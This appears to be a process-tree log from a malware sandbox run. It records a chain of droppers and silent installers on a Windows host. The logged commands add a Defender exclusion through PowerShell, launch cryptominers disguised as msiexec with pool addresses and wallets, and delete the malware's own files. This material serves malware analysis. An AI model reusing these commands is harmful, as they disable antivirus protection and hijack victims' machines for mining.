C:\Users\Admin\AppData\Local\Temp\is-SG51A.tmp\irecord.tmp"C:\Users\Admin\AppData\Local\Temp\is-SG51A.tmp\irecord.tmp" /SL5="$602D6,6265333,408064,C:\Program Files\Windows Portable Devices\DTFJGDQOIO\irecord.exe" /VERYSILENT4⤵PID:5104
-
-
-
C:\Users\Admin\AppData\Local\Temp\03-8b6e0-afb-87a9d-1a538d5b6d5c7\Kyhulanajae.exe"C:\Users\Admin\AppData\Local\Temp\03-8b6e0-afb-87a9d-1a538d5b6d5c7\Kyhulanajae.exe"3⤵PID:880
-
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\dw20.exedw20.exe -x -s 19564⤵PID:1496
-
-
-
C:\Users\Admin\AppData\Local\Temp\84-9a137-377-65187-42b3e66744e98\SHaelagamibu.exe"C:\Users\Admin\AppData\Local\Temp\84-9a137-377-65187-42b3e66744e98\SHaelagamibu.exe"3⤵PID:2484
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\hossokvd.reo\md6_6ydj.exe & exit4⤵PID:6944
-
C:\Users\Admin\AppData\Local\Temp\hossokvd.reo\md6_6ydj.exeC:\Users\Admin\AppData\Local\Temp\hossokvd.reo\md6_6ydj.exe5⤵PID:6772
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\x2dr0gnu.jbm\askinstall31.exe & exit4⤵PID:6288
-
C:\Users\Admin\AppData\Local\Temp\x2dr0gnu.jbm\askinstall31.exeC:\Users\Admin\AppData\Local\Temp\x2dr0gnu.jbm\askinstall31.exe5⤵PID:4524
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\1ocmfjms.lq4\toolspab1.exe & exit4⤵PID:6780
-
C:\Users\Admin\AppData\Local\Temp\1ocmfjms.lq4\toolspab1.exeC:\Users\Admin\AppData\Local\Temp\1ocmfjms.lq4\toolspab1.exe5⤵PID:2080
-
C:\Users\Admin\AppData\Local\Temp\1ocmfjms.lq4\toolspab1.exeC:\Users\Admin\AppData\Local\Temp\1ocmfjms.lq4\toolspab1.exe6⤵PID:6288
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ppwr22z1.1zu\GcleanerWW.exe /mixone & exit4⤵PID:7268
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\vwuzscpu.2i2\setup_10.2_mix.exe & exit4⤵PID:7952
-
C:\Users\Admin\AppData\Local\Temp\vwuzscpu.2i2\setup_10.2_mix.exeC:\Users\Admin\AppData\Local\Temp\vwuzscpu.2i2\setup_10.2_mix.exe5⤵PID:7512
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\twiihucl.3c3\app.exe /8-2222 & exit4⤵PID:840
-
C:\Users\Admin\AppData\Local\Temp\twiihucl.3c3\app.exeC:\Users\Admin\AppData\Local\Temp\twiihucl.3c3\app.exe /8-22225⤵PID:5520
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\wexqrrpx.ulq\file.exe & exit4⤵PID:6908
-
C:\Users\Admin\AppData\Local\Temp\wexqrrpx.ulq\file.exeC:\Users\Admin\AppData\Local\Temp\wexqrrpx.ulq\file.exe5⤵PID:6604
-
C:\Users\Admin\AppData\Local\Temp\RarSFX4\Setup.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX4\Setup.exe"6⤵PID:7924
-
C:\Users\Admin\AppData\Local\Temp\38L4U7OAMY\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\38L4U7OAMY\multitimer.exe" 0 3060197d33d91c80.94013368 0 1017⤵PID:7752
-
C:\Users\Admin\AppData\Local\Temp\38L4U7OAMY\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\38L4U7OAMY\multitimer.exe" 1 3.1617432595.606810139c857 1018⤵PID:8912
-
C:\Users\Admin\AppData\Local\Temp\38L4U7OAMY\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\38L4U7OAMY\multitimer.exe" 2 3.1617432595.606810139c8579⤵PID:8800
-
C:\Users\Admin\AppData\Local\Temp\i2k00t0oe0j\cpyrix.exe"C:\Users\Admin\AppData\Local\Temp\i2k00t0oe0j\cpyrix.exe" /VERYSILENT10⤵PID:3068
-
C:\Users\Admin\AppData\Roaming\2.exeC:\Users\Admin\AppData\Roaming\2.exe11⤵PID:6816
-
C:\Users\Admin\AppData\Roaming\2.exe"{path}"12⤵PID:8528
-
-
-
C:\Users\Admin\AppData\Roaming\1.exeC:\Users\Admin\AppData\Roaming\1.exe11⤵PID:8380
-
C:\Users\Admin\AppData\Local\Temp\fa6fd07a-6684-45c9-8c44-8218189382d9\AdvancedRun.exe"C:\Users\Admin\AppData\Local\Temp\fa6fd07a-6684-45c9-8c44-8218189382d9\AdvancedRun.exe" /EXEFilename "C:\Users\Admin\AppData\Local\Temp\fa6fd07a-6684-45c9-8c44-8218189382d9\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run12⤵PID:4020
-
C:\Users\Admin\AppData\Local\Temp\fa6fd07a-6684-45c9-8c44-8218189382d9\AdvancedRun.exe"C:\Users\Admin\AppData\Local\Temp\fa6fd07a-6684-45c9-8c44-8218189382d9\AdvancedRun.exe" /SpecialRun 4101d8 402013⤵PID:9744
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c timeout 112⤵PID:10776
-
C:\Windows\SysWOW64\timeout.exetimeout 113⤵
- Delays execution with timeout.exe
PID:1060
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\1.exe" -Force12⤵PID:10624
-
-
C:\Users\Admin\AppData\Roaming\1.exe"C:\Users\Admin\AppData\Roaming\1.exe"12⤵PID:10376
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 8380 -s 165612⤵
- Program crash
PID:7460
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\l4biizd2jyd\pzwkknzdzrj.exe"C:\Users\Admin\AppData\Local\Temp\l4biizd2jyd\pzwkknzdzrj.exe" /ustwo INSTALL10⤵PID:5896
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "pzwkknzdzrj.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\l4biizd2jyd\pzwkknzdzrj.exe" & exit11⤵PID:380
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "pzwkknzdzrj.exe" /f12⤵
- Kills process with taskkill
PID:3200
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\z5gksiplt4r\vict.exe"C:\Users\Admin\AppData\Local\Temp\z5gksiplt4r\vict.exe" /VERYSILENT /id=53510⤵PID:8084
-
C:\Users\Admin\AppData\Local\Temp\is-166E1.tmp\vict.tmp"C:\Users\Admin\AppData\Local\Temp\is-166E1.tmp\vict.tmp" /SL5="$20668,870426,780800,C:\Users\Admin\AppData\Local\Temp\z5gksiplt4r\vict.exe" /VERYSILENT /id=53511⤵PID:4788
-
C:\Users\Admin\AppData\Local\Temp\is-BCTOC.tmp\win1host.exe"C:\Users\Admin\AppData\Local\Temp\is-BCTOC.tmp\win1host.exe" 53512⤵PID:7392
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\4t4vzz52uj4\app.exe"C:\Users\Admin\AppData\Local\Temp\4t4vzz52uj4\app.exe" /8-2310⤵PID:8688
-
-
C:\Users\Admin\AppData\Local\Temp\ai4520lokae\Setup3310.exe"C:\Users\Admin\AppData\Local\Temp\ai4520lokae\Setup3310.exe" /Verysilent /subid=57710⤵PID:7604
-
C:\Users\Admin\AppData\Local\Temp\is-FLGL0.tmp\Setup3310.tmp"C:\Users\Admin\AppData\Local\Temp\is-FLGL0.tmp\Setup3310.tmp" /SL5="$30670,138429,56832,C:\Users\Admin\AppData\Local\Temp\ai4520lokae\Setup3310.exe" /Verysilent /subid=57711⤵PID:880
-
C:\Users\Admin\AppData\Local\Temp\is-BFB5K.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-BFB5K.tmp\Setup.exe" /Verysilent12⤵PID:5068
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\pi0yfgs0ojg\vpn.exe"C:\Users\Admin\AppData\Local\Temp\pi0yfgs0ojg\vpn.exe" /silent /subid=48210⤵PID:9972
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\L21HCO3JQR\setups.exe"C:\Users\Admin\AppData\Local\Temp\L21HCO3JQR\setups.exe" ll7⤵PID:6956
-
C:\Users\Admin\AppData\Local\Temp\is-JPC1B.tmp\setups.tmp"C:\Users\Admin\AppData\Local\Temp\is-JPC1B.tmp\setups.tmp" /SL5="$305E8,635399,250368,C:\Users\Admin\AppData\Local\Temp\L21HCO3JQR\setups.exe" ll8⤵PID:6484
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX4\askinstall20.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX4\askinstall20.exe"6⤵PID:1084
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX4\Full Program Features.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX4\Full Program Features.exe"6⤵PID:7316
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Program Files\unins.vbs"7⤵PID:8392
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" "C:\Program Files\unins0000.dll",install8⤵PID:8608
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX4\file.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX4\file.exe"6⤵PID:8520
-
C:\Users\Admin\AppData\Roaming\674C.tmp.exe"C:\Users\Admin\AppData\Roaming\674C.tmp.exe"7⤵PID:8852
-
C:\Users\Admin\AppData\Roaming\674C.tmp.exe"C:\Users\Admin\AppData\Roaming\674C.tmp.exe"8⤵PID:4176
-
-
-
C:\Users\Admin\AppData\Roaming\9A54.tmp.exe"C:\Users\Admin\AppData\Roaming\9A54.tmp.exe"7⤵PID:4904
-
C:\Windows\system32\msiexec.exe-P stratum1+ssl://0xb7633a80145Ec9ce2b8b5F80AB36C783064C2E10.work@eu-eth.hiveon.net:24443 -R --response-timeout 30 --farm-retries 999998⤵PID:9152
-
-
C:\Windows\system32\msiexec.exe-o pool.supportxmr.com:8080 -u 47wDrszce6VbnMB4zhhEA1Gr3EzwHx2eS6QzC5sFoq8iGdMjnzX8bnEjBdQHsAuW8C1SNgxyGa4DQTVnQ9jfhRod73np5P8 --cpu-max-threads-hint 50 -r 99998⤵PID:6936
-
-
-
C:\Users\Admin\AppData\Roaming\9FF2.tmp.exe"C:\Users\Admin\AppData\Roaming\9FF2.tmp.exe"7⤵PID:3944
-
C:\Windows\SysWOW64\cmd.exe/c timeout /t 3 & del /f /q C:\Users\Admin\AppData\Roaming\9FF2.tmp.exe8⤵PID:2608
-
C:\Windows\SysWOW64\timeout.exetimeout /t 39⤵
- Delays execution with timeout.exe
PID:9304
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX4\file.exe"7⤵PID:5440
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.18⤵
- Runs ping.exe
PID:9500
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX4\md2_2efs.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX4\md2_2efs.exe"6⤵PID:4876
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\p2420i51.f1f\Four.exe & exit4⤵PID:6480
-
C:\Users\Admin\AppData\Local\Temp\p2420i51.f1f\Four.exeC:\Users\Admin\AppData\Local\Temp\p2420i51.f1f\Four.exe5⤵PID:6888
-
C:\Users\Admin\AppData\Local\Temp\O6DUOTOO2A\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\O6DUOTOO2A\multitimer.exe" 0 306033e7ac94ccd3.87625057 0 1046⤵PID:7980
-
C:\Users\Admin\AppData\Local\Temp\O6DUOTOO2A\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\O6DUOTOO2A\multitimer.exe" 1 3.1617432596.60681014538a7 1047⤵PID:8372
-
C:\Users\Admin\AppData\Local\Temp\O6DUOTOO2A\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\O6DUOTOO2A\multitimer.exe" 2 3.1617432596.60681014538a78⤵PID:7712
-
C:\Users\Admin\AppData\Local\Temp\nhxlsjjinp2\cpyrix.exe"C:\Users\Admin\AppData\Local\Temp\nhxlsjjinp2\cpyrix.exe" /VERYSILENT9⤵PID:2276
-
C:\Users\Admin\AppData\Roaming\1.exeC:\Users\Admin\AppData\Roaming\1.exe10⤵PID:10588
-
C:\Users\Admin\AppData\Local\Temp\c35902dd-f681-4b3f-b9f8-311263faf0b3\AdvancedRun.exe"C:\Users\Admin\AppData\Local\Temp\c35902dd-f681-4b3f-b9f8-311263faf0b3\AdvancedRun.exe" /EXEFilename "C:\Users\Admin\AppData\Local\Temp\c35902dd-f681-4b3f-b9f8-311263faf0b3\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run11⤵PID:9484
-
C:\Users\Admin\AppData\Local\Temp\c35902dd-f681-4b3f-b9f8-311263faf0b3\AdvancedRun.exe"C:\Users\Admin\AppData\Local\Temp\c35902dd-f681-4b3f-b9f8-311263faf0b3\AdvancedRun.exe" /SpecialRun 4101d8 948412⤵PID:11072
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\1.exe" -Force11⤵PID:3356
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c timeout 111⤵PID:3520
-
C:\Windows\SysWOW64\timeout.exetimeout 112⤵
- Delays execution with timeout.exe
PID:11108
-
-
-
C:\Users\Admin\AppData\Roaming\1.exe"C:\Users\Admin\AppData\Roaming\1.exe"11⤵PID:10492
-
-
-
C:\Users\Admin\AppData\Roaming\2.exeC:\Users\Admin\AppData\Roaming\2.exe10⤵PID:10676
-
C:\Users\Admin\AppData\Roaming\2.exe"{path}"11⤵PID:9784
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\fdkxgbbybem\Setup3310.exe"C:\Users\Admin\AppData\Local\Temp\fdkxgbbybem\Setup3310.exe" /Verysilent /subid=5779⤵PID:9732
-
C:\Users\Admin\AppData\Local\Temp\is-F9NB9.tmp\Setup3310.tmp"C:\Users\Admin\AppData\Local\Temp\is-F9NB9.tmp\Setup3310.tmp" /SL5="$30488,138429,56832,C:\Users\Admin\AppData\Local\Temp\fdkxgbbybem\Setup3310.exe" /Verysilent /subid=57710⤵PID:8564
-
C:\Users\Admin\AppData\Local\Temp\is-3EVP5.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-3EVP5.tmp\Setup.exe" /Verysilent11⤵PID:3676
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\2foxhyf3mgr\app.exe"C:\Users\Admin\AppData\Local\Temp\2foxhyf3mgr\app.exe" /8-239⤵PID:9152
-
-
C:\Users\Admin\AppData\Local\Temp\1bcvhmthfz0\iuknl4wtbif.exe"C:\Users\Admin\AppData\Local\Temp\1bcvhmthfz0\iuknl4wtbif.exe" /ustwo INSTALL9⤵PID:5584
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "iuknl4wtbif.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\1bcvhmthfz0\iuknl4wtbif.exe" & exit10⤵PID:3068
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "iuknl4wtbif.exe" /f11⤵
- Kills process with taskkill
PID:10756
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\lullmmywya3\vpn.exe"C:\Users\Admin\AppData\Local\Temp\lullmmywya3\vpn.exe" /silent /subid=4829⤵PID:6156
-
C:\Users\Admin\AppData\Local\Temp\is-OMOML.tmp\vpn.tmp"C:\Users\Admin\AppData\Local\Temp\is-OMOML.tmp\vpn.tmp" /SL5="$706E4,15170975,270336,C:\Users\Admin\AppData\Local\Temp\lullmmywya3\vpn.exe" /silent /subid=48210⤵PID:9620
-
-
-
C:\Users\Admin\AppData\Local\Temp\klsqn022ryl\vict.exe"C:\Users\Admin\AppData\Local\Temp\klsqn022ryl\vict.exe" /VERYSILENT /id=5359⤵PID:8872
-
C:\Users\Admin\AppData\Local\Temp\is-V6DFV.tmp\vict.tmp"C:\Users\Admin\AppData\Local\Temp\is-V6DFV.tmp\vict.tmp" /SL5="$30682,870426,780800,C:\Users\Admin\AppData\Local\Temp\klsqn022ryl\vict.exe" /VERYSILENT /id=53510⤵PID:4168
-
C:\Users\Admin\AppData\Local\Temp\is-783O9.tmp\win1host.exe"C:\Users\Admin\AppData\Local\Temp\is-783O9.tmp\win1host.exe" 53511⤵PID:10204
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\9Q6IHJ5Y3Y\setups.exe"C:\Users\Admin\AppData\Local\Temp\9Q6IHJ5Y3Y\setups.exe" ll6⤵PID:8596
-
C:\Users\Admin\AppData\Local\Temp\is-1I6DR.tmp\setups.tmp"C:\Users\Admin\AppData\Local\Temp\is-1I6DR.tmp\setups.tmp" /SL5="$304C4,635399,250368,C:\Users\Admin\AppData\Local\Temp\9Q6IHJ5Y3Y\setups.exe" ll7⤵PID:8760
-
-
-
-
-
-
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵PID:5468
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵PID:6084
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:6372
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵PID:7944
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 7207D764E0FEEDDFDAFBEA32BA3F9FCF C2⤵PID:5484
-
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding E490EA0A00E1C4B3C9F3E55923EFF70B2⤵PID:6980
-
-
C:\Users\Admin\AppData\Roaming\Weather\Weather\prerequisites\aipackagechainer.exe"C:\Users\Admin\AppData\Roaming\Weather\Weather\prerequisites\aipackagechainer.exe"2⤵PID:10208
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\EXE3EFB.bat" "3⤵PID:9424
-
C:\Windows\SysWOW64\attrib.exeC:\Windows\System32\attrib.exe -r "C:\Users\Admin\AppData\Roaming\Weather\Weather\PREREQ~1"4⤵
- Views/modifies file attributes
PID:8704
-
-
C:\Windows\SysWOW64\timeout.exeC:\Windows\System32\timeout.exe 54⤵
- Delays execution with timeout.exe
PID:9244
-
-
C:\Windows\SysWOW64\timeout.exeC:\Windows\System32\timeout.exe 54⤵
- Delays execution with timeout.exe
PID:6448
-
-
C:\Windows\SysWOW64\timeout.exeC:\Windows\System32\timeout.exe 54⤵
- Delays execution with timeout.exe
PID:3308
-
-
C:\Windows\SysWOW64\attrib.exeC:\Windows\System32\attrib.exe -r "C:\Users\Admin\AppData\Local\Temp\EXE3EFB.bat"4⤵
- Views/modifies file attributes
PID:11228
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" del "C:\Users\Admin\AppData\Local\Temp\EXE3EFB.bat" "4⤵PID:5904
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" cls"4⤵PID:10900
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\EXE17DB.bat" "3⤵PID:9332
-
C:\Windows\SysWOW64\attrib.exeC:\Windows\System32\attrib.exe -r "C:\Users\Admin\AppData\Roaming\Weather\Weather\PREREQ~1\AIPACK~1.EXE"4⤵
- Views/modifies file attributes
PID:10096
-
-
C:\Windows\SysWOW64\timeout.exeC:\Windows\System32\timeout.exe 54⤵
- Delays execution with timeout.exe
PID:5232
-
-
C:\Windows\SysWOW64\attrib.exeC:\Windows\System32\attrib.exe -r "C:\Users\Admin\AppData\Local\Temp\EXE17DB.bat"4⤵
- Views/modifies file attributes
PID:10688
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" del "C:\Users\Admin\AppData\Local\Temp\EXE17DB.bat" "4⤵PID:7100
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" cls"4⤵PID:9040
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\is-9FG3V.tmp\setups.tmp"C:\Users\Admin\AppData\Local\Temp\is-9FG3V.tmp\setups.tmp" /SL5="$2069A,635399,250368,C:\Users\Admin\AppData\Local\Temp\AI1VB44XQC\setups.exe" ll1⤵PID:6264
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵PID:6272
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵PID:7524
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵PID:8904
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 8904 -s 9362⤵
- Program crash
PID:4808
-
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵PID:9008
-
C:\Windows\system32\werfault.exewerfault.exe /h /shared Global\48fb42cacb594b06991b15e39d389639 /t 2572 /p 25881⤵PID:2284
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe"1⤵PID:6736
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe"2⤵PID:4444
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4444.0.186162\351121441" -parentBuildID 20200403170909 -prefsHandle 1484 -prefMapHandle 1476 -prefsLen 1 -prefMapSize 219511 -appdir "C:\Program Files\Mozilla Firefox\browser" - 4444 "\\.\pipe\gecko-crash-server-pipe.4444" 1584 gpu3⤵PID:9564
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4444.3.833289039\244425583" -childID 1 -isForBrowser -prefsHandle 2632 -prefMapHandle 2628 -prefsLen 599 -prefMapSize 219511 -parentBuildID 20200403170909 -appdir "C:\Program Files\Mozilla Firefox\browser" - 4444 "\\.\pipe\gecko-crash-server-pipe.4444" 1348 tab3⤵PID:4628
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4444.13.559985829\40685391" -childID 2 -isForBrowser -prefsHandle 3224 -prefMapHandle 3220 -prefsLen 1402 -prefMapSize 219511 -parentBuildID 20200403170909 -appdir "C:\Program Files\Mozilla Firefox\browser" - 4444 "\\.\pipe\gecko-crash-server-pipe.4444" 3236 tab3⤵PID:8100
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4444.20.1867465690\195172396" -childID 3 -isForBrowser -prefsHandle 3792 -prefMapHandle 3788 -prefsLen 7393 -prefMapSize 219511 -parentBuildID 20200403170909 -appdir "C:\Program Files\Mozilla Firefox\browser" - 4444 "\\.\pipe\gecko-crash-server-pipe.4444" 3772 tab3⤵PID:7068
-
-
C:\Program Files\Mozilla Firefox\uninstall\helper.exe"C:\Program Files\Mozilla Firefox\uninstall\helper.exe" /SetAsDefaultAppUser3⤵PID:8048
-
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe"1⤵PID:4700
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=86.0.4240.111 --initial-client-data=0xc8,0xcc,0xd0,0xa4,0xd4,0x7ffe6e526e00,0x7ffe6e526e10,0x7ffe6e526e202⤵PID:9036
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1664,10580299838857046817,8624603763787166492,131072 --lang=en-US --service-sandbox-type=network --mojo-platform-channel-handle=1724 /prefetch:82⤵PID:4588
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1664,10580299838857046817,8624603763787166492,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=4 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2616 /prefetch:12⤵PID:1456
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1664,10580299838857046817,8624603763787166492,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2604 /prefetch:12⤵PID:7592
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1664,10580299838857046817,8624603763787166492,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3700 /prefetch:12⤵PID:6744
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1664,10580299838857046817,8624603763787166492,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3332 /prefetch:12⤵PID:6616
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1664,10580299838857046817,8624603763787166492,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3428 /prefetch:12⤵PID:8896
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1664,10580299838857046817,8624603763787166492,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3304 /prefetch:12⤵PID:6912
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1664,10580299838857046817,8624603763787166492,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3116 /prefetch:12⤵PID:8792
-
-
